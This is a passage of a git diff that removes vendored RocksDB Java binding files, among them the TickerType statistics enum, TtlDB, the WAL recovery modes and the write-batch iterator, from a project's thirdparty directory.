diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TickerType.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TickerType.java
deleted file mode 100644
index 948079c..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TickerType.java
+++ /dev/null
@@ -1,480 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public enum TickerType {
-
-    /**
-     * total block cache misses
-     *
-     * REQUIRES: BLOCK_CACHE_MISS == BLOCK_CACHE_INDEX_MISS +
-     *     BLOCK_CACHE_FILTER_MISS +
-     *     BLOCK_CACHE_DATA_MISS;
-     */
-    BLOCK_CACHE_MISS((byte) 0x0),
-
-    /**
-     * total block cache hit
-     *
-     * REQUIRES: BLOCK_CACHE_HIT == BLOCK_CACHE_INDEX_HIT +
-     *     BLOCK_CACHE_FILTER_HIT +
-     *     BLOCK_CACHE_DATA_HIT;
-     */
-    BLOCK_CACHE_HIT((byte) 0x1),
-
-    BLOCK_CACHE_ADD((byte) 0x2),
-
-    /**
-     * # of failures when adding blocks to block cache.
-     */
-    BLOCK_CACHE_ADD_FAILURES((byte) 0x3),
-
-    /**
-     * # of times cache miss when accessing index block from block cache.
-     */
-    BLOCK_CACHE_INDEX_MISS((byte) 0x4),
-
-    /**
-     * # of times cache hit when accessing index block from block cache.
-     */
-    BLOCK_CACHE_INDEX_HIT((byte) 0x5),
-
-    /**
-     * # of index blocks added to block cache.
-     */
-    BLOCK_CACHE_INDEX_ADD((byte) 0x6),
-
-    /**
-     * # of bytes of index blocks inserted into cache
-     */
-    BLOCK_CACHE_INDEX_BYTES_INSERT((byte) 0x7),
-
-    /**
-     * # of bytes of index block erased from cache
-     */
-    BLOCK_CACHE_INDEX_BYTES_EVICT((byte) 0x8),
-
-    /**
-     * # of times cache miss when accessing filter block from block cache.
-     */
-    BLOCK_CACHE_FILTER_MISS((byte) 0x9),
-
-    /**
-     * # of times cache hit when accessing filter block from block cache.
-     */
-    BLOCK_CACHE_FILTER_HIT((byte) 0xA),
-
-    /**
-     * # of filter blocks added to block cache.
-     */
-    BLOCK_CACHE_FILTER_ADD((byte) 0xB),
-
-    /**
-     * # of bytes of bloom filter blocks inserted into cache
-     */
-    BLOCK_CACHE_FILTER_BYTES_INSERT((byte) 0xC),
-
-    /**
-     * # of bytes of bloom filter block erased from cache
-     */
-    BLOCK_CACHE_FILTER_BYTES_EVICT((byte) 0xD),
-
-    /**
-     * # of times cache miss when accessing data block from block cache.
-     */
-    BLOCK_CACHE_DATA_MISS((byte) 0xE),
-
-    /**
-     * # of times cache hit when accessing data block from block cache.
-     */
-    BLOCK_CACHE_DATA_HIT((byte) 0xF),
-
-    /**
-     * # of data blocks added to block cache.
-     */
-    BLOCK_CACHE_DATA_ADD((byte) 0x10),
-
-    /**
-     * # of bytes of data blocks inserted into cache
-     */
-    BLOCK_CACHE_DATA_BYTES_INSERT((byte) 0x11),
-
-    /**
-     * # of bytes read from cache.
-     */
-    BLOCK_CACHE_BYTES_READ((byte) 0x12),
-
-    /**
-     * # of bytes written into cache.
-     */
-    BLOCK_CACHE_BYTES_WRITE((byte) 0x13),
-
-    /**
-     * # of times bloom filter has avoided file reads.
-     */
-    BLOOM_FILTER_USEFUL((byte) 0x14),
-
-    /**
-     * # persistent cache hit
-     */
-    PERSISTENT_CACHE_HIT((byte) 0x15),
-
-    /**
-     * # persistent cache miss
-     */
-    PERSISTENT_CACHE_MISS((byte) 0x16),
-
-    /**
-     * # total simulation block cache hits
-     */
-    SIM_BLOCK_CACHE_HIT((byte) 0x17),
-
-    /**
-     * # total simulation block cache misses
-     */
-    SIM_BLOCK_CACHE_MISS((byte) 0x18),
-
-    /**
-     * # of memtable hits.
-     */
-    MEMTABLE_HIT((byte) 0x19),
-
-    /**
-     * # of memtable misses.
-     */
-    MEMTABLE_MISS((byte) 0x1A),
-
-    /**
-     * # of Get() queries served by L0
-     */
-    GET_HIT_L0((byte) 0x1B),
-
-    /**
-     * # of Get() queries served by L1
-     */
-    GET_HIT_L1((byte) 0x1C),
-
-    /**
-     * # of Get() queries served by L2 and up
-     */
-    GET_HIT_L2_AND_UP((byte) 0x1D),
-
-    /**
-     * COMPACTION_KEY_DROP_* count the reasons for key drop during compaction
-     * There are 4 reasons currently.
-     */
-
-    /**
-     * key was written with a newer value.
-     */
-    COMPACTION_KEY_DROP_NEWER_ENTRY((byte) 0x1E),
-
-    /**
-     * Also includes keys dropped for range del.
-     * The key is obsolete.
-     */
-    COMPACTION_KEY_DROP_OBSOLETE((byte) 0x1F),
-
-    /**
-     * key was covered by a range tombstone.
-     */
-    COMPACTION_KEY_DROP_RANGE_DEL((byte) 0x20),
-
-    /**
-     * User compaction function has dropped the key.
-     */
-    COMPACTION_KEY_DROP_USER((byte) 0x21),
-
-    /**
-     * all keys in range were deleted.
-     */
-    COMPACTION_RANGE_DEL_DROP_OBSOLETE((byte) 0x22),
-
-    /**
-     * Number of keys written to the database via the Put and Write call's.
-     */
-    NUMBER_KEYS_WRITTEN((byte) 0x23),
-
-    /**
-     * Number of Keys read.
-     */
-    NUMBER_KEYS_READ((byte) 0x24),
-
-    /**
-     * Number keys updated, if inplace update is enabled
-     */
-    NUMBER_KEYS_UPDATED((byte) 0x25),
-
-    /**
-     * The number of uncompressed bytes issued by DB::Put(), DB::Delete(),\
-     * DB::Merge(), and DB::Write().
-     */
-    BYTES_WRITTEN((byte) 0x26),
-
-    /**
-     * The number of uncompressed bytes read from DB::Get().  It could be
-     * either from memtables, cache, or table files.
-     *
-     * For the number of logical bytes read from DB::MultiGet(),
-     * please use {@link #NUMBER_MULTIGET_BYTES_READ}.
-     */
-    BYTES_READ((byte) 0x27),
-
-    /**
-     * The number of calls to seek.
-     */
-    NUMBER_DB_SEEK((byte) 0x28),
-
-    /**
-     * The number of calls to next.
-     */
-    NUMBER_DB_NEXT((byte) 0x29),
-
-    /**
-     * The number of calls to prev.
-     */
-    NUMBER_DB_PREV((byte) 0x2A),
-
-    /**
-     * The number of calls to seek that returned data.
-     */
-    NUMBER_DB_SEEK_FOUND((byte) 0x2B),
-
-    /**
-     * The number of calls to next that returned data.
-     */
-    NUMBER_DB_NEXT_FOUND((byte) 0x2C),
-
-    /**
-     * The number of calls to prev that returned data.
-     */
-    NUMBER_DB_PREV_FOUND((byte) 0x2D),
-
-    /**
-     * The number of uncompressed bytes read from an iterator.
-     * Includes size of key and value.
-     */
-    ITER_BYTES_READ((byte) 0x2E),
-
-    NO_FILE_CLOSES((byte) 0x2F),
-
-    NO_FILE_OPENS((byte) 0x30),
-
-    NO_FILE_ERRORS((byte) 0x31),
-
-    /**
-     * Time system had to wait to do LO-L1 compactions.
-     *
-     * @deprecated
-     */
-    @Deprecated
-    STALL_L0_SLOWDOWN_MICROS((byte) 0x32),
-
-    /**
-     * Time system had to wait to move memtable to L1.
-     *
-     * @deprecated
-     */
-    @Deprecated
-    STALL_MEMTABLE_COMPACTION_MICROS((byte) 0x33),
-
-    /**
-     * write throttle because of too many files in L0.
-     *
-     * @deprecated
-     */
-    @Deprecated
-    STALL_L0_NUM_FILES_MICROS((byte) 0x34),
-
-    /**
-     * Writer has to wait for compaction or flush to finish.
-     */
-    STALL_MICROS((byte) 0x35),
-
-    /**
-     * The wait time for db mutex.
-     *
-     * Disabled by default. To enable it set stats level to {@link StatsLevel#ALL}
-     */
-    DB_MUTEX_WAIT_MICROS((byte) 0x36),
-
-    RATE_LIMIT_DELAY_MILLIS((byte) 0x37),
-
-    /**
-     * Number of iterators currently open.
-     */
-    NO_ITERATORS((byte) 0x38),
-
-    /**
-     * Number of MultiGet calls.
-     */
-    NUMBER_MULTIGET_CALLS((byte) 0x39),
-
-    /**
-     * Number of MultiGet keys read.
-     */
-    NUMBER_MULTIGET_KEYS_READ((byte) 0x3A),
-
-    /**
-     * Number of MultiGet bytes read.
-     */
-    NUMBER_MULTIGET_BYTES_READ((byte) 0x3B),
-
-    /**
-     * Number of deletes records that were not required to be
-     * written to storage because key does not exist.
-     */
-    NUMBER_FILTERED_DELETES((byte) 0x3C),
-    NUMBER_MERGE_FAILURES((byte) 0x3D),
-
-    /**
-     * Number of times bloom was checked before creating iterator on a
-     * file, and the number of times the check was useful in avoiding
-     * iterator creation (and thus likely IOPs).
-     */
-    BLOOM_FILTER_PREFIX_CHECKED((byte) 0x3E),
-    BLOOM_FILTER_PREFIX_USEFUL((byte) 0x3F),
-
-    /**
-     * Number of times we had to reseek inside an iteration to skip
-     * over large number of keys with same userkey.
-     */
-    NUMBER_OF_RESEEKS_IN_ITERATION((byte) 0x40),
-
-    /**
-     * Record the number of calls to {@link RocksDB#getUpdatesSince(long)}. Useful to keep track of
-     * transaction log iterator refreshes.
-     */
-    GET_UPDATES_SINCE_CALLS((byte) 0x41),
-
-    /**
-     * Miss in the compressed block cache.
-     */
-    BLOCK_CACHE_COMPRESSED_MISS((byte) 0x42),
-
-    /**
-     * Hit in the compressed block cache.
-     */
-    BLOCK_CACHE_COMPRESSED_HIT((byte) 0x43),
-
-    /**
-     * Number of blocks added to compressed block cache.
-     */
-    BLOCK_CACHE_COMPRESSED_ADD((byte) 0x44),
-
-    /**
-     * Number of failures when adding blocks to compressed block cache.
-     */
-    BLOCK_CACHE_COMPRESSED_ADD_FAILURES((byte) 0x45),
-
-    /**
-     * Number of times WAL sync is done.
-     */
-    WAL_FILE_SYNCED((byte) 0x46),
-
-    /**
-     * Number of bytes written to WAL.
-     */
-    WAL_FILE_BYTES((byte) 0x47),
-
-    /**
-     * Writes can be processed by requesting thread or by the thread at the
-     * head of the writers queue.
-     */
-    WRITE_DONE_BY_SELF((byte) 0x48),
-
-    /**
-     * Equivalent to writes done for others.
-     */
-    WRITE_DONE_BY_OTHER((byte) 0x49),
-
-    /**
-     * Number of writes ending up with timed-out.
-     */
-    WRITE_TIMEDOUT((byte) 0x4A),
-
-    /**
-     * Number of Write calls that request WAL.
-     */
-    WRITE_WITH_WAL((byte) 0x4B),
-
-    /**
-     * Bytes read during compaction.
-     */
-    COMPACT_READ_BYTES((byte) 0x4C),
-
-    /**
-     * Bytes written during compaction.
-     */
-    COMPACT_WRITE_BYTES((byte) 0x4D),
-
-    /**
-     * Bytes written during flush.
-     */
-    FLUSH_WRITE_BYTES((byte) 0x4E),
-
-    /**
-     * Number of table's properties loaded directly from file, without creating
-     * table reader object.
-     */
-    NUMBER_DIRECT_LOAD_TABLE_PROPERTIES((byte) 0x4F),
-    NUMBER_SUPERVERSION_ACQUIRES((byte) 0x50),
-    NUMBER_SUPERVERSION_RELEASES((byte) 0x51),
-    NUMBER_SUPERVERSION_CLEANUPS((byte) 0x52),
-
-    /**
-     * # of compressions/decompressions executed
-     */
-    NUMBER_BLOCK_COMPRESSED((byte) 0x53),
-    NUMBER_BLOCK_DECOMPRESSED((byte) 0x54),
-
-    NUMBER_BLOCK_NOT_COMPRESSED((byte) 0x55),
-    MERGE_OPERATION_TOTAL_TIME((byte) 0x56),
-    FILTER_OPERATION_TOTAL_TIME((byte) 0x57),
-
-    /**
-     * Row cache.
-     */
-    ROW_CACHE_HIT((byte) 0x58),
-    ROW_CACHE_MISS((byte) 0x59),
-
-    /**
-     * Read amplification statistics.
-     *
-     * Read amplification can be calculated using this formula
-     * (READ_AMP_TOTAL_READ_BYTES / READ_AMP_ESTIMATE_USEFUL_BYTES)
-     *
-     * REQUIRES: ReadOptions::read_amp_bytes_per_bit to be enabled
-     */
-
-    /**
-     * Estimate of total bytes actually used.
-     */
-    READ_AMP_ESTIMATE_USEFUL_BYTES((byte) 0x5A),
-
-    /**
-     * Total size of loaded data blocks.
-     */
-    READ_AMP_TOTAL_READ_BYTES((byte) 0x5B),
-
-    /**
-     * Number of refill intervals where rate limiter's bytes are fully consumed.
-     */
-    NUMBER_RATE_LIMITER_DRAINS((byte) 0x5C),
-
-    TICKER_ENUM_MAX((byte) 0x5D);
-
-
-    private final byte value;
-
-    TickerType(final byte value) {
-        this.value = value;
-    }
-
-    public byte getValue() {
-        return value;
-    }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TransactionLogIterator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TransactionLogIterator.java
deleted file mode 100644
index b6bfc49..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TransactionLogIterator.java
+++ /dev/null
@@ -1,111 +0,0 @@
-package org.rocksdb;
-
-/**
- * <p>A TransactionLogIterator is used to iterate over the transactions in a db.
- * One run of the iterator is continuous, i.e. the iterator will stop at the
- * beginning of any gap in sequences.</p>
- */
-public class TransactionLogIterator extends RocksObject {
-
-  /**
-   * <p>An iterator is either positioned at a WriteBatch
-   * or not valid. This method returns true if the iterator
-   * is valid. Can read data from a valid iterator.</p>
-   *
-   * @return true if iterator position is valid.
-   */
-  public boolean isValid() {
-    return isValid(nativeHandle_);
-  }
-
-  /**
-   * <p>Moves the iterator to the next WriteBatch.
-   * <strong>REQUIRES</strong>: Valid() to be true.</p>
-   */
-  public void next() {
-    next(nativeHandle_);
-  }
-
-  /**
-   * <p>Throws RocksDBException if something went wrong.</p>
-   *
-   * @throws org.rocksdb.RocksDBException if something went
-   *     wrong in the underlying C++ code.
-   */
-  public void status() throws RocksDBException {
-    status(nativeHandle_);
-  }
-
-  /**
-   * <p>If iterator position is valid, return the current
-   * write_batch and the sequence number of the earliest
-   * transaction contained in the batch.</p>
-   *
-   * <p>ONLY use if Valid() is true and status() is OK.</p>
-   *
-   * @return {@link org.rocksdb.TransactionLogIterator.BatchResult}
-   *     instance.
-   */
-  public BatchResult getBatch() {
-    assert(isValid());
-    return getBatch(nativeHandle_);
-  }
-
-  /**
-   * <p>TransactionLogIterator constructor.</p>
-   *
-   * @param nativeHandle address to native address.
-   */
-  TransactionLogIterator(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  /**
-   * <p>BatchResult represents a data structure returned
-   * by a TransactionLogIterator containing a sequence
-   * number and a {@link WriteBatch} instance.</p>
-   */
-  public static final class BatchResult {
-    /**
-     * <p>Constructor of BatchResult class.</p>
-     *
-     * @param sequenceNumber related to this BatchResult instance.
-     * @param nativeHandle to {@link org.rocksdb.WriteBatch}
-     *     native instance.
-     */
-    public BatchResult(final long sequenceNumber,
-        final long nativeHandle) {
-      sequenceNumber_ = sequenceNumber;
-      writeBatch_ = new WriteBatch(nativeHandle, true);
-    }
-
-    /**
-     * <p>Return sequence number related to this BatchResult.</p>
-     *
-     * @return Sequence number.
-     */
-    public long sequenceNumber() {
-      return sequenceNumber_;
-    }
-
-    /**
-     * <p>Return contained {@link org.rocksdb.WriteBatch}
-     * instance</p>
-     *
-     * @return {@link org.rocksdb.WriteBatch} instance.
-     */
-    public WriteBatch writeBatch() {
-      return writeBatch_;
-    }
-
-    private final long sequenceNumber_;
-    private final WriteBatch writeBatch_;
-  }
-
-  @Override protected final native void disposeInternal(final long handle);
-  private native boolean isValid(long handle);
-  private native void next(long handle);
-  private native void status(long handle)
-      throws RocksDBException;
-  private native BatchResult getBatch(long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TtlDB.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TtlDB.java
deleted file mode 100644
index 740f512..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TtlDB.java
+++ /dev/null
@@ -1,211 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.List;
-
-/**
- * Database with TTL support.
- *
- * <p><strong>Use case</strong></p>
- * <p>This API should be used to open the db when key-values inserted are
- * meant to be removed from the db in a non-strict 'ttl' amount of time
- * Therefore, this guarantees that key-values inserted will remain in the
- * db for &gt;= ttl amount of time and the db will make efforts to remove the
- * key-values as soon as possible after ttl seconds of their insertion.
- * </p>
- *
- * <p><strong>Behaviour</strong></p>
- * <p>TTL is accepted in seconds
- * (int32_t)Timestamp(creation) is suffixed to values in Put internally
- * Expired TTL values deleted in compaction only:(Timestamp+ttl&lt;time_now)
- * Get/Iterator may return expired entries(compaction not run on them yet)
- * Different TTL may be used during different Opens
- * </p>
- *
- * <p><strong>Example</strong></p>
- * <ul>
- * <li>Open1 at t=0 with ttl=4 and insert k1,k2, close at t=2</li>
- * <li>Open2 at t=3 with ttl=5. Now k1,k2 should be deleted at t&gt;=5</li>
- * </ul>
- *
- * <p>
- * read_only=true opens in the usual read-only mode. Compactions will not be
- *  triggered(neither manual nor automatic), so no expired entries removed
- * </p>
- *
- * <p><strong>Constraints</strong></p>
- * <p>Not specifying/passing or non-positive TTL behaves
- * like TTL = infinity</p>
- *
- * <p><strong>!!!WARNING!!!</strong></p>
- * <p>Calling DB::Open directly to re-open a db created by this API will get
- * corrupt values(timestamp suffixed) and no ttl effect will be there
- * during the second Open, so use this API consistently to open the db
- * Be careful when passing ttl with a small positive value because the
- * whole database may be deleted in a small amount of time.</p>
- */
-public class TtlDB extends RocksDB {
-
-  /**
-   * <p>Opens a TtlDB.</p>
-   *
-   * <p>Database is opened in read-write mode without default TTL.</p>
-   *
-   * @param options {@link org.rocksdb.Options} instance.
-   * @param db_path path to database.
-   *
-   * @return TtlDB instance.
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public static TtlDB open(final Options options, final String db_path)
-      throws RocksDBException {
-    return open(options, db_path, 0, false);
-  }
-
-  /**
-   * <p>Opens a TtlDB.</p>
-   *
-   * @param options {@link org.rocksdb.Options} instance.
-   * @param db_path path to database.
-   * @param ttl time to live for new entries.
-   * @param readOnly boolean value indicating if database if db is
-   *     opened read-only.
-   *
-   * @return TtlDB instance.
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public static TtlDB open(final Options options, final String db_path,
-      final int ttl, final boolean readOnly) throws RocksDBException {
-    return new TtlDB(open(options.nativeHandle_, db_path, ttl, readOnly));
-  }
-
-  /**
-   * <p>Opens a TtlDB.</p>
-   *
-   * @param options {@link org.rocksdb.Options} instance.
-   * @param db_path path to database.
-   * @param columnFamilyDescriptors list of column family descriptors
-   * @param columnFamilyHandles will be filled with ColumnFamilyHandle instances
-   *     on open.
-   * @param ttlValues time to live values per column family handle
-   * @param readOnly boolean value indicating if database if db is
-   *     opened read-only.
-   *
-   * @return TtlDB instance.
-   *
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   * @throws java.lang.IllegalArgumentException when there is not a ttl value
-   *     per given column family handle.
-   */
-  public static TtlDB open(final DBOptions options, final String db_path,
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors,
-      final List<ColumnFamilyHandle> columnFamilyHandles,
-      final List<Integer> ttlValues, final boolean readOnly)
-      throws RocksDBException {
-    if (columnFamilyDescriptors.size() != ttlValues.size()) {
-      throw new IllegalArgumentException("There must be a ttl value per column"
-          + "family handle.");
-    }
-
-    final byte[][] cfNames = new byte[columnFamilyDescriptors.size()][];
-    final long[] cfOptionHandles = new long[columnFamilyDescriptors.size()];
-    for (int i = 0; i < columnFamilyDescriptors.size(); i++) {
-      final ColumnFamilyDescriptor cfDescriptor =
-          columnFamilyDescriptors.get(i);
-      cfNames[i] = cfDescriptor.columnFamilyName();
-      cfOptionHandles[i] = cfDescriptor.columnFamilyOptions().nativeHandle_;
-    }
-
-    final int ttlVals[] = new int[ttlValues.size()];
-    for(int i = 0; i < ttlValues.size(); i++) {
-      ttlVals[i] = ttlValues.get(i);
-    }
-    final long[] handles = openCF(options.nativeHandle_, db_path,
-            cfNames, cfOptionHandles, ttlVals, readOnly);
-
-    final TtlDB ttlDB = new TtlDB(handles[0]);
-    for (int i = 1; i < handles.length; i++) {
-      columnFamilyHandles.add(new ColumnFamilyHandle(ttlDB, handles[i]));
-    }
-    return ttlDB;
-  }
-
-  /**
-   * <p>Creates a new ttl based column family with a name defined
-   * in given ColumnFamilyDescriptor and allocates a
-   * ColumnFamilyHandle within an internal structure.</p>
-   *
-   * <p>The ColumnFamilyHandle is automatically disposed with DB
-   * disposal.</p>
-   *
-   * @param columnFamilyDescriptor column family to be created.
-   * @param ttl TTL to set for this column family.
-   *
-   * @return {@link org.rocksdb.ColumnFamilyHandle} instance.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public ColumnFamilyHandle createColumnFamilyWithTtl(
-      final ColumnFamilyDescriptor columnFamilyDescriptor,
-      final int ttl) throws RocksDBException {
-    return new ColumnFamilyHandle(this,
-        createColumnFamilyWithTtl(nativeHandle_,
-            columnFamilyDescriptor.columnFamilyName(),
-            columnFamilyDescriptor.columnFamilyOptions().nativeHandle_, ttl));
-  }
-
-  /**
-   * <p>Close the TtlDB instance and release resource.</p>
-   *
-   * <p>Internally, TtlDB owns the {@code rocksdb::DB} pointer
-   * to its associated {@link org.rocksdb.RocksDB}. The release
-   * of that RocksDB pointer is handled in the destructor of the
-   * c++ {@code rocksdb::TtlDB} and should be transparent to
-   * Java developers.</p>
-   */
-  @Override
-  public void close() {
-      super.close();
-  }
-
-  /**
-   * <p>A protected constructor that will be used in the static
-   * factory method
-   * {@link #open(Options, String, int, boolean)}
-   * and
-   * {@link #open(DBOptions, String, java.util.List, java.util.List,
-   * java.util.List, boolean)}.
-   * </p>
-   *
-   * @param nativeHandle The native handle of the C++ TtlDB object
-   */
-  protected TtlDB(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  @Override protected void finalize() throws Throwable {
-    close(); //TODO(AR) revisit here when implementing AutoCloseable
-    super.finalize();
-  }
-
-  private native static long open(final long optionsHandle,
-      final String db_path, final int ttl, final boolean readOnly)
-      throws RocksDBException;
-  private native static long[] openCF(final long optionsHandle,
-      final String db_path, final byte[][] columnFamilyNames,
-      final long[] columnFamilyOptions, final int[] ttlValues,
-      final boolean readOnly) throws RocksDBException;
-  private native long createColumnFamilyWithTtl(final long handle,
-      final byte[] columnFamilyName, final long columnFamilyOptions, int ttl)
-      throws RocksDBException;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/VectorMemTableConfig.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/VectorMemTableConfig.java
deleted file mode 100644
index 3783402..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/VectorMemTableConfig.java
+++ /dev/null
@@ -1,45 +0,0 @@
-package org.rocksdb;
-
-/**
- * The config for vector memtable representation.
- */
-public class VectorMemTableConfig extends MemTableConfig {
-  public static final int DEFAULT_RESERVED_SIZE = 0;
-
-  /**
-   * VectorMemTableConfig constructor
-   */
-  public VectorMemTableConfig() {
-    reservedSize_ = DEFAULT_RESERVED_SIZE;
-  }
-
-  /**
-   * Set the initial size of the vector that will be used
-   * by the memtable created based on this config.
-   *
-   * @param size the initial size of the vector.
-   * @return the reference to the current config.
-   */
-  public VectorMemTableConfig setReservedSize(final int size) {
-    reservedSize_ = size;
-    return this;
-  }
-
-  /**
-   * Returns the initial size of the vector used by the memtable
-   * created based on this config.
-   *
-   * @return the initial size of the vector.
-   */
-  public int reservedSize() {
-    return reservedSize_;
-  }
-
-  @Override protected long newMemTableFactoryHandle() {
-    return newMemTableFactoryHandle(reservedSize_);
-  }
-
-  private native long newMemTableFactoryHandle(long reservedSize)
-      throws IllegalArgumentException;
-  private int reservedSize_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WALRecoveryMode.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WALRecoveryMode.java
deleted file mode 100644
index d3fc47b..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WALRecoveryMode.java
+++ /dev/null
@@ -1,83 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * The WAL Recover Mode
- */
-public enum WALRecoveryMode {
-
-  /**
-   * Original levelDB recovery
-   *
-   * We tolerate incomplete record in trailing data on all logs
-   * Use case : This is legacy behavior (default)
-   */
-  TolerateCorruptedTailRecords((byte)0x00),
-
-  /**
-   * Recover from clean shutdown
-   *
-   * We don't expect to find any corruption in the WAL
-   * Use case : This is ideal for unit tests and rare applications that
-   * can require high consistency guarantee
-   */
-  AbsoluteConsistency((byte)0x01),
-
-  /**
-   * Recover to point-in-time consistency
-   * We stop the WAL playback on discovering WAL inconsistency
-   * Use case : Ideal for systems that have disk controller cache like
-   * hard disk, SSD without super capacitor that store related data
-   */
-  PointInTimeRecovery((byte)0x02),
-
-  /**
-   * Recovery after a disaster
-   * We ignore any corruption in the WAL and try to salvage as much data as
-   * possible
-   * Use case : Ideal for last ditch effort to recover data or systems that
-   * operate with low grade unrelated data
-   */
-  SkipAnyCorruptedRecords((byte)0x03);
-
-  private byte value;
-
-  WALRecoveryMode(final byte value) {
-    this.value = value;
-  }
-
-  /**
-   * <p>Returns the byte value of the enumerations value.</p>
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value;
-  }
-
-  /**
-   * <p>Get the WALRecoveryMode enumeration value by
-   * passing the byte identifier to this method.</p>
-   *
-   * @param byteIdentifier of WALRecoveryMode.
-   *
-   * @return CompressionType instance.
-   *
-   * @throws IllegalArgumentException If WALRecoveryMode cannot be found for the
-   *   provided byteIdentifier
-   */
-  public static WALRecoveryMode getWALRecoveryMode(final byte byteIdentifier) {
-    for (final WALRecoveryMode walRecoveryMode : WALRecoveryMode.values()) {
-      if (walRecoveryMode.getValue() == byteIdentifier) {
-        return walRecoveryMode;
-      }
-    }
-
-    throw new IllegalArgumentException(
-        "Illegal value provided for WALRecoveryMode.");
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WBWIRocksIterator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WBWIRocksIterator.java
deleted file mode 100644
index d45da2b..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WBWIRocksIterator.java
+++ /dev/null
@@ -1,184 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public class WBWIRocksIterator
-    extends AbstractRocksIterator<WriteBatchWithIndex> {
-  private final WriteEntry entry = new WriteEntry();
-
-  protected WBWIRocksIterator(final WriteBatchWithIndex wbwi,
-      final long nativeHandle) {
-    super(wbwi, nativeHandle);
-  }
-
-  /**
-   * Get the current entry
-   *
-   * The WriteEntry is only valid
-   * until the iterator is repositioned.
-   * If you want to keep the WriteEntry across iterator
-   * movements, you must make a copy of its data!
-   *
-   * Note - This method is not thread-safe with respect to the WriteEntry
-   * as it performs a non-atomic update across the fields of the WriteEntry
-   *
-   * @return The WriteEntry of the current entry
-   */
-  public WriteEntry entry() {
-    assert(isOwningHandle());
-    final long ptrs[] = entry1(nativeHandle_);
-
-    entry.type = WriteType.fromId((byte)ptrs[0]);
-    entry.key.resetNativeHandle(ptrs[1], ptrs[1] != 0);
-    entry.value.resetNativeHandle(ptrs[2], ptrs[2] != 0);
-
-    return entry;
-  }
-
-  @Override protected final native void disposeInternal(final long handle);
-  @Override final native boolean isValid0(long handle);
-  @Override final native void seekToFirst0(long handle);
-  @Override final native void seekToLast0(long handle);
-  @Override final native void next0(long handle);
-  @Override final native void prev0(long handle);
-  @Override final native void seek0(long handle, byte[] target, int targetLen);
-  @Override final native void status0(long handle) throws RocksDBException;
-
-  private native long[] entry1(final long handle);
-
-  /**
-   * Enumeration of the Write operation
-   * that created the record in the Write Batch
-   */
-  public enum WriteType {
-    PUT((byte)0x1),
-    MERGE((byte)0x2),
-    DELETE((byte)0x4),
-    LOG((byte)0x8);
-
-    final byte id;
-    WriteType(final byte id) {
-      this.id = id;
-    }
-
-    public static WriteType fromId(final byte id) {
-      for(final WriteType wt : WriteType.values()) {
-        if(id == wt.id) {
-          return wt;
-        }
-      }
-      throw new IllegalArgumentException("No WriteType with id=" + id);
-    }
-  }
-
-  @Override
-  public void close() {
-    entry.close();
-    super.close();
-  }
-
-  /**
-   * Represents an entry returned by
-   * {@link org.rocksdb.WBWIRocksIterator#entry()}
-   *
-   * It is worth noting that a WriteEntry with
-   * the type {@link org.rocksdb.WBWIRocksIterator.WriteType#DELETE}
-   * or {@link org.rocksdb.WBWIRocksIterator.WriteType#LOG}
-   * will not have a value.
-   */
-  public static class WriteEntry implements AutoCloseable {
-    WriteType type = null;
-    final DirectSlice key;
-    final DirectSlice value;
-
-    /**
-     * Intentionally private as this
-     * should only be instantiated in
-     * this manner by the outer WBWIRocksIterator
-     * class; The class members are then modified
-     * by calling {@link org.rocksdb.WBWIRocksIterator#entry()}
-     */
-    private WriteEntry() {
-      key = new DirectSlice();
-      value = new DirectSlice();
-    }
-
-    public WriteEntry(final WriteType type, final DirectSlice key,
-        final DirectSlice value) {
-      this.type = type;
-      this.key = key;
-      this.value = value;
-    }
-
-    /**
-     * Returns the type of the Write Entry
-     *
-     * @return the WriteType of the WriteEntry
-     */
-    public WriteType getType() {
-      return type;
-    }
-
-    /**
-     * Returns the key of the Write Entry
-     *
-     * @return The slice containing the key
-     * of the WriteEntry
-     */
-    public DirectSlice getKey() {
-      return key;
-    }
-
-    /**
